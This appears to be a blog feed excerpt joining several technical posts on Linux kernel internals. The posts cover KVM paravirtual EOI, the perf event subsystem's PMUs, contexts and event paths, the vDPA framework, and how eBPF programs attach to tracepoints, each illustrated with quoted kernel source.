<h4> guest trigger EOI </h4>
<p>When the guest writes an EOI, ‘kvm_guest_apic_eoi_write’ is called.
It first checks whether ‘KVM_PV_EOI_BIT’ is set. If it is, it clears the bit and returns, avoiding the VM-exit.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static notrace void kvm_guest_apic_eoi_write(u32 reg, u32 val)
{
/**
* This relies on __test_and_clear_bit to modify the memory
* in a way that is atomic with respect to the local CPU.
* The hypervisor only accesses this memory from the local CPU so
* there's no need for lock or memory barriers.
* An optimization barrier is implied in apic write.
*/
if (__test_and_clear_bit(KVM_PV_EOI_BIT, this_cpu_ptr(&kvm_apic_eoi)))
return;
apic->native_eoi_write(APIC_EOI, APIC_EOI_ACK);
}
</code></pre></div></div>
Linux kernel perf architecture2020-08-29T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/29/perf-arch
<h3> Component overview </h3>
<p>The Linux perf subsystem is very useful for performance profiling. The following shows the perf subsystem components, from this <a href="https://leezhenghui.github.io/linux/2019/03/05/exploring-usdt-on-linux.html">post</a>.</p>
<p><img src="/assets/img/perf/1.png" alt="" /></p>
<p>‘perf’ is the user program that can be used to do performance profiling.</p>
<p>The only syscall exposed to userspace is perf_event_open, which returns a perf event fd. This syscall has no glibc wrapper. More info can be found in the <a href="https://www.man7.org/linux/man-pages/man2/perf_event_open.2.html">man page</a>. It is one of the most complicated functions in the kernel.</p>
<p>‘perf_event’ is the core struct in kernel. There are several types of perf event, such as tracepoint, software, hardware.</p>
<p>We can also attach an eBPF program to a trace event through the perf event fd.</p>
<h3> Abstract layer </h3>
<p>Following shows the abstract layer of perf.</p>
<p><img src="/assets/img/perf/2.png" alt="" /></p>
<p>Every type of perf event has a corresponding PMU (performance monitoring unit). For example, the tracepoint PMU is defined as follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct pmu perf_tracepoint = {
.task_ctx_nr = perf_sw_context,
.event_init = perf_tp_event_init,
.add = perf_trace_add,
.del = perf_trace_del,
.start = perf_swevent_start,
.stop = perf_swevent_stop,
.read = perf_swevent_read,
};
</code></pre></div></div>
<p>The hardware-related PMUs have arch-specific abstract structures like ‘struct x86_pmu’. The hardware-related structures read and write the performance monitoring MSRs.</p>
<p>Every PMU is registered by calling ‘perf_pmu_register’.</p>
<h3> Perf event context </h3>
<p>perf can monitor both cpu-related and task-related events, and each can have several monitored events, so we need a context to connect the events: ‘perf_event_context’.</p>
<p>There are two kinds of context, software and hardware, defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> enum perf_event_task_context {
perf_invalid_context = -1,
perf_hw_context = 0,
perf_sw_context,
perf_nr_task_contexts,
};
</code></pre></div></div>
<p>For CPU level, the context is defined as ‘perf_cpu_context’ and is defined as percpu variable in ‘struct pmu’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pmu {
...
struct perf_cpu_context __percpu *pmu_cpu_context;
};
</code></pre></div></div>
<p>If the PMU is the same type, they will share one ‘struct perf_cpu_context’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int perf_pmu_register(struct pmu *pmu, const char *name, int type)
{
int cpu, ret, max = PERF_TYPE_MAX;
mutex_lock(&pmus_lock);
...
pmu->pmu_cpu_context = find_pmu_context(pmu->task_ctx_nr);
if (pmu->pmu_cpu_context)
goto got_cpu_context;
ret = -ENOMEM;
pmu->pmu_cpu_context = alloc_percpu(struct perf_cpu_context);
if (!pmu->pmu_cpu_context)
goto free_dev;
for_each_possible_cpu(cpu) {
struct perf_cpu_context *cpuctx;
cpuctx = per_cpu_ptr(pmu->pmu_cpu_context, cpu);
__perf_event_init_context(&cpuctx->ctx);
lockdep_set_class(&cpuctx->ctx.mutex, &cpuctx_mutex);
lockdep_set_class(&cpuctx->ctx.lock, &cpuctx_lock);
cpuctx->ctx.pmu = pmu;
cpuctx->online = cpumask_test_cpu(cpu, perf_online_mask);
__perf_mux_hrtimer_init(cpuctx, cpu);
cpuctx->heap_size = ARRAY_SIZE(cpuctx->heap_default);
cpuctx->heap = cpuctx->heap_default;
}
...
}
</code></pre></div></div>
<p>Following pic shows the related structure, from this <a href="https://blog.csdn.net/pwl999/article/details/81200439">post</a>.</p>
<p><img src="/assets/img/perf/3.png" alt="" /></p>
<p>For task level, the ‘task_struct’ has a pointer array defined as this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct task_struct {
struct perf_event_context *perf_event_ctxp[perf_nr_task_contexts];
};
</code></pre></div></div>
<p>Following pic shows the related structure, also from this <a href="https://blog.csdn.net/pwl999/article/details/81200439">post</a>.</p>
<p><img src="/assets/img/perf/4.png" alt="" /></p>
<p>A CPU-level perf event is triggered while the cpu is online, but a task-level perf event is only triggered while the task is running.
The ‘perf_cpu_context’s task_ctx holds the currently running task’s perf context.</p>
<h3> Perf event context schedule </h3>
<p>One of perf’s jobs is to schedule the task’s perf_event_context in and out.</p>
<p>Following pic shows the task schedule in and out function related with perf.</p>
<p><img src="/assets/img/perf/5.png" alt="" /></p>
<p>Finally the PMU’s add and del callbacks are called. Let’s use tracepoint as an example: the add callback is ‘perf_trace_add’ and the del callback is ‘perf_trace_del’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int perf_trace_add(struct perf_event *p_event, int flags)
{
struct trace_event_call *tp_event = p_event->tp_event;
if (!(flags & PERF_EF_START))
p_event->hw.state = PERF_HES_STOPPED;
/*
* If TRACE_REG_PERF_ADD returns false; no custom action was performed
* and we need to take the default action of enqueueing our event on
* the right per-cpu hlist.
*/
if (!tp_event->class->reg(tp_event, TRACE_REG_PERF_ADD, p_event)) {
struct hlist_head __percpu *pcpu_list;
struct hlist_head *list;
pcpu_list = tp_event->perf_events;
if (WARN_ON_ONCE(!pcpu_list))
return -EINVAL;
list = this_cpu_ptr(pcpu_list);
hlist_add_head_rcu(&p_event->hlist_entry, list);
}
return 0;
}
void perf_trace_del(struct perf_event *p_event, int flags)
{
struct trace_event_call *tp_event = p_event->tp_event;
/*
* If TRACE_REG_PERF_DEL returns false; no custom action was performed
* and we need to take the default action of dequeueing our event from
* the right per-cpu hlist.
*/
if (!tp_event->class->reg(tp_event, TRACE_REG_PERF_DEL, p_event))
hlist_del_rcu(&p_event->hlist_entry);
}
</code></pre></div></div>
<p>The ‘perf_event’ is added to or removed from the ‘tp_event->perf_events’ list.</p>
<h3> perf_event_open flow </h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> perf_event_open
->perf_copy_attr
->get_unused_fd_flags(fd)
->perf_event_alloc
->perf_init_event
->perf_try_init_event
->pmu->event_init()
->find_get_context
->perf_install_in_context
->__perf_install_in_context
->add_event_to_ctx
->list_add_event
->perf_group_attach
->add_event_to_ctx
->fd_install
</code></pre></div></div>
<p>perf_event_open calls ‘pmu->event_init’ to initialize the event and then adds the perf_event to a perf_event_context.</p>
<h3> tracepoint event in perf </h3>
<p>Recall the definition of tracepoint PMU.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct pmu perf_tracepoint = {
.task_ctx_nr = perf_sw_context,
.event_init = perf_tp_event_init,
.add = perf_trace_add,
.del = perf_trace_del,
.start = perf_swevent_start,
.stop = perf_swevent_stop,
.read = perf_swevent_read,
};
</code></pre></div></div>
<p>Let’s try to figure out how the perf subsystem monitors a tracepoint event.</p>
<h4> perf event initialization </h4>
<p>‘perf_tp_event_init’ is called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>perf_tp_event_init
->perf_trace_init
->perf_trace_event_init
->perf_trace_event_reg
->tp_event->class->reg(TRACE_REG_PERF_REGISTER)
</code></pre></div></div>
<p>‘perf_trace_init’ will find the specified tracepoint.</p>
<p>‘perf_trace_event_reg’ will allocate and initialize the ‘tp_event->perf_events’ percpu lists and call ‘tp_event->class->reg’ with TRACE_REG_PERF_REGISTER.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int perf_trace_event_reg(struct trace_event_call *tp_event,
struct perf_event *p_event)
{
struct hlist_head __percpu *list;
int ret = -ENOMEM;
int cpu;
p_event->tp_event = tp_event;
if (tp_event->perf_refcount++ > 0)
return 0;
list = alloc_percpu(struct hlist_head);
if (!list)
goto fail;
for_each_possible_cpu(cpu)
INIT_HLIST_HEAD(per_cpu_ptr(list, cpu));
tp_event->perf_events = list;
...
ret = tp_event->class->reg(tp_event, TRACE_REG_PERF_REGISTER, NULL);
if (ret)
goto fail;
total_ref_count++;
return 0;
...
}
</code></pre></div></div>
<p>The ‘tp_event->class->reg’ callback is ‘trace_event_reg’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int trace_event_reg(struct trace_event_call *call,
enum trace_reg type, void *data)
{
struct trace_event_file *file = data;
WARN_ON(!(call->flags & TRACE_EVENT_FL_TRACEPOINT));
switch (type) {
...
#ifdef CONFIG_PERF_EVENTS
case TRACE_REG_PERF_REGISTER:
return tracepoint_probe_register(call->tp,
call->class->perf_probe,
call);
case TRACE_REG_PERF_UNREGISTER:
tracepoint_probe_unregister(call->tp,
call->class->perf_probe,
call);
return 0;
case TRACE_REG_PERF_OPEN:
case TRACE_REG_PERF_CLOSE:
case TRACE_REG_PERF_ADD:
case TRACE_REG_PERF_DEL:
return 0;
#endif
}
return 0;
}
</code></pre></div></div>
<p>We can see the ‘call->class->perf_probe’ will be registered to the tracepoint. From my <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/09/ebpf-with-tracepoint">post</a> we know that this ‘perf_probe’ is ‘perf_trace_##call’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static notrace void \
perf_trace_##call(void *__data, proto) \
{ \
struct trace_event_call *event_call = __data; \
struct trace_event_data_offsets_##call __maybe_unused __data_offsets;\
struct trace_event_raw_##call *entry; \
struct pt_regs *__regs; \
u64 __count = 1; \
struct task_struct *__task = NULL; \
struct hlist_head *head; \
int __entry_size; \
int __data_size; \
int rctx; \
\
__data_size = trace_event_get_offsets_##call(&__data_offsets, args); \
\
head = this_cpu_ptr(event_call->perf_events); \
if (!bpf_prog_array_valid(event_call) && \
__builtin_constant_p(!__task) && !__task && \
hlist_empty(head)) \
return; \
\
__entry_size = ALIGN(__data_size + sizeof(*entry) + sizeof(u32),\
sizeof(u64)); \
__entry_size -= sizeof(u32); \
\
entry = perf_trace_buf_alloc(__entry_size, &__regs, &rctx); \
if (!entry) \
return; \
\
perf_fetch_caller_regs(__regs); \
\
tstruct \
\
{ assign; } \
\
perf_trace_run_bpf_submit(entry, __entry_size, rctx, \
event_call, __count, __regs, \
head, __task); \
}
</code></pre></div></div>
<p>If the ‘event_call->perf_events’ list is empty, no perf_event is currently attached to this tracepoint.
This is the default state right after ‘perf_event_open’ initializes a perf_event.</p>
<h4> perf event add </h4>
<p>When the task is scheduled onto a CPU, ‘pmu->add’ will be called and it will link the ‘perf_event’ into the ‘event_call->perf_events’ linked lists.</p>
<h4> perf event del </h4>
<p>When the task is scheduled off the CPU, ‘pmu->del’ will be called and it will remove the ‘perf_event’ from the ‘event_call->perf_events’ linked lists.</p>
<h4> perf event trigger </h4>
<p>If the ‘event_call->perf_events’ list is not empty, ‘perf_trace_run_bpf_submit’ will be called. If no eBPF program is attached, ‘perf_tp_event’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void perf_tp_event(u16 event_type, u64 count, void *record, int entry_size,
struct pt_regs *regs, struct hlist_head *head, int rctx,
struct task_struct *task)
{
struct perf_sample_data data;
struct perf_event *event;
struct perf_raw_record raw = {
.frag = {
.size = entry_size,
.data = record,
},
};
perf_sample_data_init(&data, 0, 0);
data.raw = &raw;
perf_trace_buf_update(record, event_type);
hlist_for_each_entry_rcu(event, head, hlist_entry) {
if (perf_tp_event_match(event, &data, regs))
perf_swevent_event(event, count, &data, regs);
}
...
perf_swevent_put_recursion_context(rctx);
}
</code></pre></div></div>
<p>For every ‘perf_event’ in the ‘event_call->perf_events’ list, it calls ‘perf_swevent_event’ to trigger a perf event.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void perf_swevent_event(struct perf_event *event, u64 nr,
struct perf_sample_data *data,
struct pt_regs *regs)
{
struct hw_perf_event *hwc = &event->hw;
local64_add(nr, &event->count);
if (!regs)
return;
if (!is_sampling_event(event))
return;
if ((event->attr.sample_type & PERF_SAMPLE_PERIOD) && !event->attr.freq) {
data->period = nr;
return perf_swevent_overflow(event, 1, data, regs);
} else
data->period = event->hw.last_period;
if (nr == 1 && hwc->sample_period == 1 && !event->attr.freq)
return perf_swevent_overflow(event, 1, data, regs);
if (local64_add_negative(nr, &hwc->period_left))
return;
perf_swevent_overflow(event, 0, data, regs);
}
</code></pre></div></div>
<p>‘perf_swevent_event’ increments ‘event->count’. If the event is not a sampling event it just returns; this is perf’s count mode.
If the perf_event is in sample mode, it also needs to copy the tracepoint data. Following is the callchain.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> perf_swevent_overflow->__perf_event_overflow->event->overflow_handler(perf_event_output).
</code></pre></div></div>
<h3> software perf event </h3>
<p>The software PMU is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct pmu perf_swevent = {
.task_ctx_nr = perf_sw_context,
.capabilities = PERF_PMU_CAP_NO_NMI,
.event_init = perf_swevent_init,
.add = perf_swevent_add,
.del = perf_swevent_del,
.start = perf_swevent_start,
.stop = perf_swevent_stop,
.read = perf_swevent_read,
};
</code></pre></div></div>
<h4> perf event initialization</h4>
<p>‘perf_swevent_init’ will be called. It calls ‘swevent_hlist_get’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int perf_swevent_init(struct perf_event *event)
{
u64 event_id = event->attr.config;
if (event->attr.type != PERF_TYPE_SOFTWARE)
return -ENOENT;
/*
* no branch sampling for software events
*/
if (has_branch_stack(event))
return -EOPNOTSUPP;
switch (event_id) {
case PERF_COUNT_SW_CPU_CLOCK:
case PERF_COUNT_SW_TASK_CLOCK:
return -ENOENT;
default:
break;
}
if (event_id >= PERF_COUNT_SW_MAX)
return -ENOENT;
if (!event->parent) {
int err;
err = swevent_hlist_get();
if (err)
return err;
static_key_slow_inc(&perf_swevent_enabled[event_id]);
event->destroy = sw_perf_event_destroy;
}
return 0;
}
</code></pre></div></div>
<p>This creates the percpu ‘swhash->swevent_hlist’ lists and sets perf_swevent_enabled[event_id] to true.</p>
<h4> perf event add </h4>
<p>‘perf_swevent_add’ adds the perf_event to the percpu hash lists.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int perf_swevent_add(struct perf_event *event, int flags)
{
struct swevent_htable *swhash = this_cpu_ptr(&swevent_htable);
struct hw_perf_event *hwc = &event->hw;
struct hlist_head *head;
if (is_sampling_event(event)) {
hwc->last_period = hwc->sample_period;
perf_swevent_set_period(event);
}
hwc->state = !(flags & PERF_EF_START);
head = find_swevent_head(swhash, event);
if (WARN_ON_ONCE(!head))
return -EINVAL;
hlist_add_head_rcu(&event->hlist_entry, head);
perf_event_update_userpage(event);
return 0;
}
</code></pre></div></div>
<h4> perf event del </h4>
<p>‘perf_swevent_del’ removes the event from the hash lists.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void perf_swevent_del(struct perf_event *event, int flags)
{
hlist_del_rcu(&event->hlist_entry);
}
</code></pre></div></div>
<h4> perf event trigger </h4>
<p>Take the task switch as an example.</p>
<p>The ‘perf_sw_event_sched’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline void perf_event_task_sched_out(struct task_struct *prev,
struct task_struct *next)
{
perf_sw_event_sched(PERF_COUNT_SW_CONTEXT_SWITCHES, 1, 0);
if (static_branch_unlikely(&perf_sched_events))
__perf_event_task_sched_out(prev, next);
}
</code></pre></div></div>
<p>After the perf_event_task_sched_out -> ___perf_sw_event -> do_perf_sw_event callchain, we reach:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void do_perf_sw_event(enum perf_type_id type, u32 event_id,
u64 nr,
struct perf_sample_data *data,
struct pt_regs *regs)
{
struct swevent_htable *swhash = this_cpu_ptr(&swevent_htable);
struct perf_event *event;
struct hlist_head *head;
rcu_read_lock();
head = find_swevent_head_rcu(swhash, type, event_id);
if (!head)
goto end;
hlist_for_each_entry_rcu(event, head, hlist_entry) {
if (perf_swevent_match(event, type, event_id, data, regs))
perf_swevent_event(event, nr, data, regs);
}
end:
rcu_read_unlock();
}
</code></pre></div></div>
<p>As we can see, it finally calls ‘perf_swevent_event’ to trigger an event.</p>
<h3> hardware perf event </h3>
<p>One of the hardware PMUs (the x86 one) is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct pmu pmu = {
.pmu_enable = x86_pmu_enable,
.pmu_disable = x86_pmu_disable,
.attr_groups = x86_pmu_attr_groups,
.event_init = x86_pmu_event_init,
.event_mapped = x86_pmu_event_mapped,
.event_unmapped = x86_pmu_event_unmapped,
.add = x86_pmu_add,
.del = x86_pmu_del,
.start = x86_pmu_start,
.stop = x86_pmu_stop,
.read = x86_pmu_read,
.start_txn = x86_pmu_start_txn,
.cancel_txn = x86_pmu_cancel_txn,
.commit_txn = x86_pmu_commit_txn,
.event_idx = x86_pmu_event_idx,
.sched_task = x86_pmu_sched_task,
.task_ctx_size = sizeof(struct x86_perf_task_context),
.swap_task_ctx = x86_pmu_swap_task_ctx,
.check_period = x86_pmu_check_period,
.aux_output_match = x86_pmu_aux_output_match,
};
</code></pre></div></div>
<p>The hardware perf event path is more involved since it interacts with the hardware; we will not go deep into the hardware details here.</p>
<h4> perf event init </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> x86_pmu_event_init
->__x86_pmu_event_init
->x86_reserve_hardware
->x86_pmu.hw_config()
->validate_event
</code></pre></div></div>
<p>The ‘x86_pmu’ here is an arch-specific PMU structure.</p>
<h4> perf event add </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> x86_pmu_add
->collect_events
->x86_pmu.schedule_events()
->x86_pmu.add
</code></pre></div></div>
<p>‘collect_events’ collects the events into the per-cpu event list:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> cpuc->event_list[n] = leader;
</code></pre></div></div>
<h4> perf event del </h4>
<p>x86_pmu_del will delete the event from ‘cpuc->event_list’.</p>
<h4> perf event trigger </h4>
<p>When the hardware event triggers, it raises an NMI. The handler for this is ‘perf_event_nmi_handler’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int
perf_event_nmi_handler(unsigned int cmd, struct pt_regs *regs)
{
u64 start_clock;
u64 finish_clock;
int ret;
/*
* All PMUs/events that share this PMI handler should make sure to
* increment active_events for their events.
*/
if (!atomic_read(&active_events))
return NMI_DONE;
start_clock = sched_clock();
ret = x86_pmu.handle_irq(regs);
finish_clock = sched_clock();
perf_sample_event_took(finish_clock - start_clock);
return ret;
}
</code></pre></div></div>
<p>Take ‘x86_pmu.handle_irq’ = x86_pmu_handle_irq as an example.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> for (idx = 0; idx < x86_pmu.num_counters; idx++) {
if (!test_bit(idx, cpuc->active_mask))
continue;
event = cpuc->events[idx];
val = x86_perf_event_update(event);
if (val & (1ULL << (x86_pmu.cntval_bits - 1)))
continue;
/*
* event overflow
*/
handled++;
perf_sample_data_init(&data, 0, event->hw.last_period);
if (!x86_perf_event_set_period(event))
continue;
if (perf_event_overflow(event, &data, regs))
x86_pmu_stop(event, 0);
}
</code></pre></div></div>
<p>Here we can see it iterates over ‘cpuc’ to find which event triggered this interrupt.</p>
vDPA kernel framework introduction2020-08-22T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/22/vdpa-analysis
<p>Virtual data path acceleration (vDPA) is a new technology to accelerate performance (like other hardware offloading). A vDPA device is a device whose datapath complies with the virtio spec but whose control path is vendor-specific.</p>
<p>The vDPA device can be implemented by a PF, VF, VDEV or SF. In order to support vDPA devices and hide the complexity of the hardware, a vDPA kernel framework has been implemented. Following is the overview architecture, which is from <a href="https://www.redhat.com/en/blog/vdpa-kernel-framework-part-1-vdpa-bus-abstracting-hardware">vDPA Kernel Framework Part #1: vDPA Bus for Abstracting Hardware</a>.</p>
<p><img src="/assets/img/vdpa/1.png" alt="" /></p>
<p>The vDPA framework is used to abstract the vDPA devices and present them as virtio devices to the vhost/virtio subsystems. There are three components in the vDPA framework.</p>
<h3> vDPA bus </h3>
<p>The code is in ‘drivers/vdpa/vdpa.c’. The vDPA bus holds the several types of vDPA bus drivers and vDPA devices.
Some of the exported functions:</p>
<ul>
<li>
<p>‘__vdpa_alloc_device’: This is called from the vDPA device driver; it allocates a vdpa device, and the ‘vdpa_config_ops’ parameter is used to specify the vendor-specific operations. These operations include ‘virtqueue ops’, ‘device ops’ and ‘dma ops’.</p>
</li>
<li>
<p>‘vdpa_register_device’: register a vDPA device</p>
</li>
<li>
<p>‘__vdpa_register_driver’: register a vDPA bus driver</p>
</li>
</ul>
<p>The vDPA bus is registered at system startup.</p>
<h3> vDPA device driver </h3>
<p>The vDPA device driver is used to communicate directly with the vDPA device through the vendor-specific method and present an abstract vDPA device to the vDPA bus. There are currently two vDPA device drivers.</p>
<ul>
<li>ifcvf device driver: in drivers/vdpa/ifcvf directory. This is currently the only vDPA hardware device driver in upstream.</li>
<li>vdpa simulator: in drivers/vdpa/vdpa_sim directory. This is just a vDPA simulator device driver.</li>
</ul>
<p>In the driver’s probe function, it will call ‘vdpa_register_device’ to register a vDPA device.</p>
<h3> vDPA bus driver </h3>
<p>vDPA bus driver is used to connect the vDPA bus to vhost and virtio subsystem. There are two types of vDPA bus drivers.</p>
<ul>
<li>
<p>vhost vdpa bus driver: the code is in ‘drivers/vhost/vdpa.c’. This driver connects the vDPA bus to the vhost subsystem and exports a vhost char device to userspace. The userspace can then use this vhost device to bypass the host kernel.</p>
</li>
<li>
<p>virtio vdpa bus driver: the code is in ‘drivers/virtio/virtio_vdpa.c’. This driver abstracts the vdpa device as a virtio device. It creates a virtio device on the virtio bus.</p>
</li>
</ul>
<p>Following shows the data structure relations.</p>
<p><img src="/assets/img/vdpa/2.png" alt="" /></p>
How eBPF program connects with tracepoint2020-08-09T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/09/ebpf-with-tracepoint
<p>In the last post <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/08/trace-event-framework">Linux tracing - trace event framework</a> I discussed the internals of trace events. Now it’s time to look at how a trace event connects with an eBPF program.</p>
<h3> trace event under perf </h3>
<p>When the perf subsystem is configured in, ‘TRACE_EVENT’ will be defined as follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> include/trace/perf.h
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
static notrace void \
perf_trace_##call(void *__data, proto) \
{ \
struct trace_event_call *event_call = __data; \
struct trace_event_data_offsets_##call __maybe_unused __data_offsets;\
struct trace_event_raw_##call *entry; \
struct pt_regs *__regs; \
u64 __count = 1; \
struct task_struct *__task = NULL; \
struct hlist_head *head; \
int __entry_size; \
int __data_size; \
int rctx; \
\
__data_size = trace_event_get_offsets_##call(&__data_offsets, args); \
\
head = this_cpu_ptr(event_call->perf_events); \
if (!bpf_prog_array_valid(event_call) && \
__builtin_constant_p(!__task) && !__task && \
hlist_empty(head)) \
return; \
\
__entry_size = ALIGN(__data_size + sizeof(*entry) + sizeof(u32),\
sizeof(u64)); \
__entry_size -= sizeof(u32); \
\
entry = perf_trace_buf_alloc(__entry_size, &__regs, &rctx); \
if (!entry) \
return; \
\
perf_fetch_caller_regs(__regs); \
\
tstruct \
\
{ assign; } \
\
perf_trace_run_bpf_submit(entry, __entry_size, rctx, \
event_call, __count, __regs, \
head, __task); \
}
</code></pre></div></div>
<p>As we know, this is very like the ‘probe’ callback of ‘trace_event_class’, ‘trace_event_raw_event_##call’. In fact, ‘trace_event_class’ has a ‘perf_probe’ callback and it will be assigned ‘perf_trace_##call’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> include/trace/trace_events.h
#ifdef CONFIG_PERF_EVENTS
#define _TRACE_PERF_PROTO(call, proto) \
static notrace void \
perf_trace_##call(void *__data, proto);
#define _TRACE_PERF_INIT(call) \
.perf_probe = perf_trace_##call,
static struct trace_event_class __used __refdata event_class_##call = { \
.system = TRACE_SYSTEM_STRING, \
.define_fields = trace_event_define_fields_##call, \
.fields = LIST_HEAD_INIT(event_class_##call.fields),\
.raw_init = trace_event_raw_init, \
.probe = trace_event_raw_event_##call, \
.reg = trace_event_reg, \
_TRACE_PERF_INIT(call) \
};
</code></pre></div></div>
<p>When userspace calls the ‘perf_event_open’ syscall and specifies a tracepoint to monitor, it will call the ‘tp_event->class->reg’ callback with ‘TRACE_REG_PERF_REGISTER’. This callback (trace_event_reg) will call ‘tracepoint_probe_register’ with ‘call->class->perf_probe’ to add ‘perf_trace_##call’ to the tracepoint’s funcs member.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kernel/trace/trace_event_perf.c:perf_trace_event_reg
tp_event->class->reg(tp_event, TRACE_REG_PERF_REGISTER, NULL);
kernel/trace/trace_events.c
int trace_event_reg(struct trace_event_call *call,
enum trace_reg type, void *data)
{
struct trace_event_file *file = data;
WARN_ON(!(call->flags & TRACE_EVENT_FL_TRACEPOINT));
switch (type) {
case TRACE_REG_REGISTER:
return tracepoint_probe_register(call->tp,
call->class->probe,
file);
case TRACE_REG_UNREGISTER:
tracepoint_probe_unregister(call->tp,
call->class->probe,
file);
return 0;
#ifdef CONFIG_PERF_EVENTS
case TRACE_REG_PERF_REGISTER:
return tracepoint_probe_register(call->tp,
call->class->perf_probe,
call);
case TRACE_REG_PERF_UNREGISTER:
tracepoint_probe_unregister(call->tp,
call->class->perf_probe,
call);
return 0;
case TRACE_REG_PERF_OPEN:
case TRACE_REG_PERF_CLOSE:
case TRACE_REG_PERF_ADD:
case TRACE_REG_PERF_DEL:
return 0;
#endif
}
return 0;
}
</code></pre></div></div>
<p>When ‘trace_xxx_xxx’ is called, the tracepoint’s funcs will be called, so ‘perf_trace_##call’ will be called. In ‘perf_trace_##call’, the perf subsystem allocates a buffer and calls ‘perf_trace_run_bpf_submit’ to commit it. This is where ‘trace_call_bpf’ runs the eBPF program.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void perf_trace_run_bpf_submit(void *raw_data, int size, int rctx,
struct trace_event_call *call, u64 count,
struct pt_regs *regs, struct hlist_head *head,
struct task_struct *task)
{
if (bpf_prog_array_valid(call)) {
*(struct pt_regs **)raw_data = regs;
if (!trace_call_bpf(call, raw_data) || hlist_empty(head)) {
perf_swevent_put_recursion_context(rctx);
return;
}
}
perf_tp_event(call->event.type, count, raw_data, size, regs, head,
rctx, task);
}
</code></pre></div></div>
<h3> Connect eBPF program with tracepoint </h3>
<p>When userspace calls ‘ioctl(PERF_EVENT_IOC_SET_BPF)’, ‘perf_event_set_bpf_prog’ will handle the request. ‘perf_event_attach_bpf_prog’ is then called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int perf_event_attach_bpf_prog(struct perf_event *event,
struct bpf_prog *prog)
{
struct bpf_prog_array __rcu *old_array;
struct bpf_prog_array *new_array;
int ret = -EEXIST;
mutex_lock(&bpf_event_mutex);
if (event->prog)
goto unlock;
old_array = event->tp_event->prog_array;
if (old_array &&
bpf_prog_array_length(old_array) >= BPF_TRACE_MAX_PROGS) {
ret = -E2BIG;
goto unlock;
}
ret = bpf_prog_array_copy(old_array, NULL, prog, &new_array);
if (ret < 0)
goto unlock;
/* set the new array to event->tp_event and set event->prog */
event->prog = prog;
rcu_assign_pointer(event->tp_event->prog_array, new_array);
bpf_prog_array_free(old_array);
unlock:
mutex_unlock(&bpf_event_mutex);
return ret;
}
</code></pre></div></div>
<p>This is quite trivial as it just adds the eBPF program to ‘event->tp_event->prog_array’. Here ‘tp_event’ is a ‘struct trace_event_call’.</p>
<p>When ‘perf_trace_run_bpf_submit’ calls ‘trace_call_bpf’, this eBPF program will be called. The ‘*(struct pt_regs **)raw_data = regs;’ line looks quite strange.
This commit <a href="https://github.com/torvalds/linux/commit/98b5c2c65c2951772a8fc661f50d675e450e8bce">perf, bpf: allow bpf programs attach to tracepoints</a> explains what it is for. We should also notice that if ‘trace_call_bpf’ returns a non-zero value, the original ‘perf_tp_event’ will be called and the event data will be copied to the perf subsystem buffer.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> kernel/events/core.c
void perf_trace_run_bpf_submit(void *raw_data, int size, int rctx,
struct trace_event_call *call, u64 count,
struct pt_regs *regs, struct hlist_head *head,
struct task_struct *task)
{
if (bpf_prog_array_valid(call)) {
*(struct pt_regs **)raw_data = regs;
if (!trace_call_bpf(call, raw_data) || hlist_empty(head)) {
perf_swevent_put_recursion_context(rctx);
return;
}
}
perf_tp_event(call->event.type, count, raw_data, size, regs, head,
rctx, task);
}
kernel/trace/bpf_trace.c
